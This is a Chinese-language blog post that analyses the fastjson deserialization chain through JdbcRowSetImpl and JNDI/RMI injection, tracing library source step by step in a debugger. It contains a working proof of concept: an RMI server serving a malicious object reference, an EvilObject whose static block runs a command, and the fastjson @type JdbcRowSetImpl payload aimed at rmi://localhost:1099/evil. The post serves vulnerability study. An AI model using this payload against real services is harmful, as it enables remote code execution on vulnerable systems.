fastjson反序列化JdbcRowSetImpl链

最新推荐文章于 2022-07-18 23:53:29 发布
最新推荐文章于 2022-07-18 23:53:29 发布
阅读量258 收藏
点赞数
分类专栏: Java安全 文章标签: java 反序列化 fastjson templateImpl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/125686354
版权

fastjson反序列化JdbcRowSetImpl链

这里开始需要JNDIRMI的知识了Java之RMI和JNDI

从上面的文章知道了InitialContext.lookup(String name)是检索命名对象,先从InitialContext.lookup(String name)开始分析,之后再从JdbcRowSetImpl分析。

先放Poc的链接

RMI服务端

启动服务端

public class RMIServer {

    public static void main(String argv[]) {

        try {
            Registry  registry =  LocateRegistry.createRegistry(1099);

            //如果通过rmi无法找到org.lain.poc.jndi.EvilObjectFactory,则尝试从factoryLocation 获取
            //因此,本地测试的话,如果factory正确,factoryLocation随便填写
            Reference reference = new Reference("EvilObject",
                    "org.lain.poc.jndi.EvilObjectFactory",
                    "http://localhost:9999/" );


            //客户端通过evil查找,获取到EvilObject
            registry.bind("evil", new ReferenceWrapper(reference));

            System.out.println("Ready!");
            System.out.println("Waiting for connection......");

        } catch (Exception e) {
            System.out.println("RMIServer: " + e.getMessage());
            e.printStackTrace();
        }
    }
}

客户端

启动客户端在lookup(String name)打断点

public class Client {

    public static void main(String[] args) throws NamingException {

        /*初始化*/
        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY,
                "com.sun.jndi.rmi.registry.RegistryContextFactory");
        env.put(Context.PROVIDER_URL, "rmi://localhost:1099");//localhost
        //env.put(Context.PROVIDER_URL, "rmi://xx.xx.xx.xx:1090");//remote

        /*JDK1.8xx trustURLCodebase默认是false*/
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");

        Context ctx = new InitialContext(env);

        System.out.println(ctx.lookup("evil"));
    }
}

InitialContext

首先进入的是lookup(String name)

//InitialContext.java
public Object lookup(String name) throws NamingException {
    return getURLOrDefaultInitCtx(name).lookup(name);
}

顾名思义getURLOrDefaultInitCtx是拿到URLCtx,跟lookup(name)

//RegistryContext.java
public Object lookup(String var1) throws NamingException {
    return this.lookup((Name)(new CompositeName(var1)));
}

public Object lookup(Name var1) throws NamingException {
    if (var1.isEmpty()) {
        return new RegistryContext(this);
    } else {
        Remote var2;
        try {
            var2 = this.registry.lookup(var1.get(0)); //继续跟进来
        } catch{...}

        return this.decodeObject(var2, var1.getPrefix(1));
    }
}

this.registry.lookup(var1.get(0))后发现进到了RegistryImpl_Stub,从类名的Stub可以知道这是大概是远程对象Client代理。

//RegistryImpl_Stub.java
public Remote lookup(String var1) throws AccessException, NotBoundException, RemoteException {
    try {
        RemoteCall var2 = this.ref.newCall(this, operations, 2, 4905912898345647071L);

        try {
            ObjectOutput var3 = var2.getOutputStream();
            var3.writeObject(var1);
        } catch (IOException var17) {
            throw new MarshalException("error marshalling arguments", var17);
        }

        this.ref.invoke(var2);

        Remote var22;
        try {
            ObjectInput var4 = var2.getInputStream();
            var22 = (Remote)var4.readObject();
        } catch (IOException var14) {
            throw new UnmarshalException("error unmarshalling return", var14);
        } catch (ClassNotFoundException var15) {
            throw new UnmarshalException("error unmarshalling return", var15);
        } finally {
            this.ref.done(var2);
        }

        return var22;
    } catch (RuntimeException var18) {
        throw var18;
    } catch (RemoteException var19) {
        throw var19;
    } catch (NotBoundException var20) {
        throw var20;
    } catch (Exception var21) {
        throw new UnexpectedException("undeclared checked exception", var21);
    }
}

得到了var2是一个ReferenceWrapper_Stub,跟decodeObject()方法

//RegistryContext.java
public Object lookup(Name var1) throws NamingException {
   if (var1.isEmpty()) {
        return new RegistryContext(this);
    } else {
        Remote var2;
        try {
            var2 = this.registry.lookup(var1.get(0));
        } catch{...}

        return this.decodeObject(var2, var1.getPrefix(1));
    }
    
    return this.decodeObject(var2, var1.getPrefix(1)); //跟这个
   
}

private Object decodeObject(Remote var1, Name var2) throws NamingException {
    try {
        Object var3 = var1 instanceof RemoteReference ? ((RemoteReference)var1).getReference() : var1;
        Reference var8 = null;
        if (var3 instanceof Reference) {
            var8 = (Reference)var3;
        } else if (var3 instanceof Referenceable) {
            var8 = ((Referenceable)((Referenceable)var3)).getReference();
        }

        if (var8 != null && var8.getFactoryClassLocation() != null && !trustURLCodebase) {
            throw new ConfigurationException("The object factory is untrusted. Set the system property 'com.sun.jndi.rmi.object.trustURLCodebase' to 'true'.");
        } else {
            return NamingManager.getObjectInstance(var3, var2, this, this.environment);
        }
    } catch (NamingException var5){...}
}

var3是注册在RegistryEvilObject,跟getObjectInstance()方法,顾名思义get实例。

public static Object
    getObjectInstance(Object refInfo, Name name, Context nameCtx,
                      Hashtable<?,?> environment)
    throws Exception{
    ObjectFactory factory;
    
    if (ref != null) {
        String f = ref.getFactoryClassName();
        if (f != null) {
            // if reference identifies a factory, use exclusively

            factory = getObjectFactoryFromReference(ref, f);
            if (factory != null) {
                return factory.getObjectInstance(ref, name, nameCtx,
                                                 environment);
            }
            // No factory found, so return original refInfo.
            // Will reach this point if factory class is not in
            // class path and reference does not contain a URL for it
            return refInfo;

        } else {...}
    }
}

getObjectFactoryFromReference(ref, f)得到Factory对象然后factory.getObjectInstance(ref, name, nameCtx,environment)因为EvilObjectFactory实现了ObjectFactory接口且实现了getObjectInstance()方法

//EvilObjectFactory.java
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {

    EvilObject evilObject = new EvilObject();

    return evilObject;
}

new的时候根据加载机制先加载static代码块,也就执行了恶意代码

//EvilObject.java
public class EvilObject {

    public EvilObject(){
        System.out.println("Hi!");
    }
    /**
     * 简单的命令执行
     */
    static {
        try {
            Runtime.getRuntime().exec("calc");
        }catch (IOException e){
            //ignore
        }
    }
}

到此从InitialContext.lookup()开始的调用链结束了,而下面才要开始分析JdbcRowSetImpl如何调用InitialContext.lookup()的。

JdbcRowSetImpl

public class App 
{
    public static void main(String[] args )throws Exception
    {

        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        JdbcRowSetImplPoC.testJdbcRowSetImpl("rmi://localhost:1099/evil");

    }
}

public class JdbcRowSetImplPoC {

    public static void testJdbcRowSetImpl(String dataSourceName){

        ParserConfig config = new ParserConfig();

        config.setAutoTypeSupport(true);

        String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","
            + "\"dataSourceName\":\"" + dataSourceName + "\","
            + "\"autoCommit\":\"false\"}";


        System.out.println(payload);

        try{
            JSONObject.parse(payload,config);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

需要把trustURLCodebase属性调为True否则不能引用远程对象,会报错。

还有因为最开始看的文章说autoCommit设置为True会调用setAutoCommit()方法,搞的我以为必须要True,实际上只要是Boolean类型即可。

同样的启动RMI服务端,然后在JSONObject.parse(payload,config)打上断点。

//JSON.java
public static Object parse(String text) {
    return parse(text, DEFAULT_PARSER_FEATURE);
}

public static Object parse(String text, ParserConfig config) {
    return parse(text, config, DEFAULT_PARSER_FEATURE);
}


public static Object parse(String text, ParserConfig config, int features) {
    if (text == null) {
        return null;
    }

    DefaultJSONParser parser = new DefaultJSONParser(text, config, features);
    Object value = parser.parse();

    parser.handleResovleTask(value);

    parser.close();

    return value;
}

DefaultJSONParser()方法得到一个DefaultJSONParser对象,跟入parser.parse()

//DefaultJSONParser.java
public Object parse() {
    return parse(null);
}

public Object parse(Object fieldName) {
    final JSONLexer lexer = this.lexer;

    case LBRACE:
    JSONObject object = new JSONObject(lexer.isEnabled(Feature.OrderedField));
    return parseObject(object, fieldName);
}

这个parseObject()方法应该会觉得眼熟吧,如果之前了解过TemplatesImpl利用链的话。

//DefaultJSONParser.java
public final Object parseObject(final Map object, Object fieldName){
    //类型检查
    clazz = config.checkAutoType(typeName, null, lexer.getFeatures());
    
    ObjectDeserializer deserializer = config.getDeserializer(clazz);
    return deserializer.deserialze(this, clazz, fieldName);
}

checkAutoType()方法检查传入的类型是否安全,如果通过就会返回传入类型Class

config.getDeserializer(clazz)返回的类型比较怪,因为用到ASM技术,没办法直接查看源码,需要用IDEARun to Cursor或者快捷键Alt + F9,强行从光标处调试代码。跟deserialze()

//JavaBeanDeserializer.java
public <T> T deserialze(DefaultJSONParser parser, Type type, Object fieldName) {
    return deserialze(parser, type, fieldName, 0);
}

public <T> T deserialze(DefaultJSONParser parser, Type type, Object fieldName, int features) {
    return deserialze(parser, type, fieldName, null, features, null);
}

protected <T> T deserialze(DefaultJSONParser parser, Type type, Object fieldName, Object object, int features, int[] setFlags){
    if (type == JSON.class || type == JSONObject.class) {/*光标放这然后Alt+F9*/}
    
    String typeKey = beanInfo.typeKey;
    /*随后的代码是调用各个字段的FieldDeserializers*/
    
    //一直F8到这
    fieldDeser.setValue(object, fieldValue);
    
}

这时的fieldDeser是一个专门解析autoCommit属性的FieldDeserializer

//FieldDeserializer.java
public void setValue(Object object, Object value){
    Method method = fieldInfo.method;//拿到setAutoCommit(boolean)的Method
    if (method != null){
        if(fieldInfo.getOnly){}
        else{
            method.invoke(object, value);
        }
    }
}

invoke我们的setAutoCommit(boolean)!尽头近在咫尺😋

但是不懂为啥,我的IDEA直接跳了一大段,建议从调用栈找一下JdbcRowSetImpl.setAutoCommit(boolean),或者直接去JdbcRowSetImpl.setAutoCommit(boolean)点一下 Run to Cursor

//JdbcRowSetImpl.java
public void setAutoCommit(boolean var1) throws SQLException {
    if (this.conn != null) {
        this.conn.setAutoCommit(var1);
    } else {
        this.conn = this.connect(); //跟这个
        this.conn.setAutoCommit(var1);
    }
}

private Connection connect() throws SQLException {
    if (this.conn != null) {
        return this.conn;
    } else if (this.getDataSourceName() != null) {
        try {
            InitialContext var1 = new InitialContext();
            DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
        } catch (NamingException var3) {}
    } else {}
}

看到在try代码块里的这2行代码不就是本篇最开始分析的调用链吗?只是lookup()里的是this.getDataSourceName()而不是我们硬编码的**“rmi://localhost:1099/evil”**。执行到lookup()方法,那么JdbcRowSetImpl利用链也就结束了。

不同版本绕过的payload参考文章:

小莫神和他的的
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
fastjson反序列化漏洞_fastjson结合JdbcRowSetImpl反序列化利用理解
weixin_39783156的博客
11-28 436
前言最近看到网上有新出的fastjson反序列化利用,就好奇的琢磨了一下,查了一些资料然后整理出来,有不正确的地方还望指正。反序列化的利用本质:找到一条有效的攻击,攻击的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。构造一个触发器,也就是通过什么方式来让攻击执行你想要的代码。触发器可以通过很多方式,比如静态代码块、构造方法等等。fastjson是阿里巴...
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1442
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
JAVA反序列化学习5】fastjson反序列化JdbcRowSetImpl类JNDI注入分析
GX233的博客
06-01 877
fastjson反序列化JdbcRowSetImpl类JNDI注入
14-java安全——fastjson1.2.24反序列化JdbcRowSetImpl利用分析
网络安全
09-01 732
fastjson在1.2.24版本中,除了TemplatesImpl之外,还有一个JdbcRowSetImpl利用JdbcRowSetImpl有两种利用方式:一种是RMI和JNDI利用方式,另一种是JNDI和LDAP利用方式,关于JNDI的相关概念之前在java安全基础中已经介绍过了,而且底层原理已经分析过了,大家可自行参考以下文章。 4-java安全基础——RMI远程调用 5-java安全基础——RMI和JNDI实现漏洞利用 6-java安全基础——JNDI和LDAP利用 1. RMI
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用分析(TemplatesImpl,JdbcRowSetImpl
m0_64685672的博客
02-03 2754
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan一个简单的Fastjson反序列化检测burp插件我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说...
fastjson反序列化利用
最新发布
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
1.2.24 Fastjson反序列化TemplatesImplJdbcRowSetImpl利用分析(非常详细)
dreamthe的博客
07-07 2057
本文的关于Fastjson1.2.24版本TemplatesImpl利用的分析非常详细,如果你不是很熟悉该利用,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
Fastjson 反序列化 Jndi 注入利用 JdbcRowSetImpl
Love&Share
02-26 5033
文章目录Fastjson 反序列化Fastjson 组件使用案例漏洞原理Jndi注入利用JdbcRowSetImpl原理复现调试高级利用-推荐阅读Fastjson姿势技巧fastjson检测参考文章 Fastjson 反序列化 Fastjson 组件是阿里巴巴开发的反序列化与序列化组件 Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因: Fastjson 提供了反序列化功能,允许用户在输入 JSON 串时通过 “@type” 键对应的 value 指定任意反序列化类名 Fastj.
JAVA详细思路|Java安全之FastJson JdbcRowSetImpl 分析
m0_57227221的博客
05-17 1038
Java安全之FastJson JdbcRowSetImpl 分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用JdbcRowSetImpl 的利用在实际运用中较为广泛,这个基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
Fastjson JdbcRowSetImpl利用学习
虚幻私塾
04-15 1413
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
Java反序列化6-Fastjson JdbcRowSetImpl 及后续漏洞分析
weixin_43263451的博客
07-18 1176
上一节讲了TemplatesImpl的利用方式,但是呢其局限性较大需要后端开启Feature.SupportNonPublicField且因为Feature.SupportNonPublicField是在fastjson1.2.22版本才引入所以只影响1.2.22-1.2.24版本fastjson这里的JdbcRowSetImplTemplatesImpl利用范围更大一点后面版本的fastjson漏洞都是在绕过黑名单,所以在本文中一次全部陈述总结前言.前言.前言。............
FastJson JdbcRowSetImpl 分析
Vicl1fe的博客
07-17 621
前言 继续跟着大佬学习fastjson利用。之前写了fastjson TemplateImple利用。里面分析了fastjson的一些数据流向。 对于JdbcRowSetImpl。这个基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。 环境 jdk1.8_102 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</arti
FastJson<=1.2.24 JdbcRowSetImpl利用分析
weixin_45682070的博客
12-29 3313
前言 上文分析了TemplatesImpl利用,对fastjson parseObject函数进行了分析,明白了整个触发漏洞的流程,接着来学习JdbcRowSetImpl 利用JdbcRowSetImpl的利用在实际运用中较为广泛,这个基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。这条主要利用了setAutoCommit方法调用InitialContext.lookup并且参数是未经过滤dataSourceName,导致JNDI注入,造成命令执行。其中涉及了JDNI
fastjson反序列化JdbcRowSetImpl
weixin_30596735的博客
12-28 390
Gadget com.sun.rowset.JdbcRowSetImpl setAutoCommit() -> connect() -> InitialContext.lookup() poc如下,dataSourceName 为rmi://localhost:1090/evil: String payload = "{\"@type\":\"Lcom.s...
原来不只是fastjson,这个你每天都在用的类库也被爆过反序列化漏洞!
勇往直前的专栏
07-13 294
在《fastjson到底做错了什么?为什么会被频繁爆出漏洞?》文章中,我从技术角度分析过为什么fastjson会被频繁爆出一些安全漏洞,然后有人在评论区发表"说到底就是fastjson烂…"等言论,一般遇到这种评论我都是不想理的。 但是事后想想,这个事情还是要单独说一下,因为这种想法很危险。 一旦这位读者有一天当上了领导,那么如果他负责的项目发生了漏洞,他还是站出来说"都怪XXX代码写的烂…",这其实是非常可怕的。 工作久了的话,就会慢慢有种感觉:代码都是人写的,是人写的代码就可能存在漏洞,这个是永远
fastjson反序列化复现
08-12
Fastjson反序列化漏洞是指在反序列化过程中,攻击者可以构造恶意的JSON字符串,通过利用Fastjson的特性和漏洞来执行任意代码。具体的复现过程如下: 1. 构造恶意的JSON字符串,其中包含需要执行的代码。可以利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值